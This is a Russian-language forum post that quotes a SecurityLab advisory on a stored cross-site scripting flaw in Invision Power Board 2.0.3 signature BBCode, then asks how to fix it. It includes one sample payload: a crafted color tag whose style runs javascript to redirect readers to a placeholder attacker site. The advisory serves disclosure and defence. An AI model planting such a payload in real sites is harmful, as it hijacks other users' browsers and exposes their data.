Перейти к контенту
  • 0

Уязвимость


pikachoo1

Вопрос

Межсайтовый скриптинг в Invision Power Board

Программа: Invision Power Board 2.0.3

 

Опасность: Низкая

 

Наличие эксплоита: Да

 

Описание:

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важным данным других пользователей.

 

Уязвимость существует из-за некорректной обработки входных данных в некоторых BBCode тегах в подписи. Удаленный пользователь может с помощью специально сформированного тега сохранить злонамеренную подпись, которая будет отображаться в каждом сообщении злоумышленника, и выполнить произвольный HTML сценарий в браузере других пользователей. Пример:

 

[color=http://server/=%60image.jpg]`style

=background:url("javascrip t:document.location.replace('http://[attackersite]');")

 

URL производителя: www.invisionboard.com

 

Решение: Способов устранения уязвимости не существует в настоящее время.

 

И как это вылечить?

 

 

(с) http://www.securitylab.ru/53604.html

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

Гость
Эта тема закрыта для публикации сообщений.
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.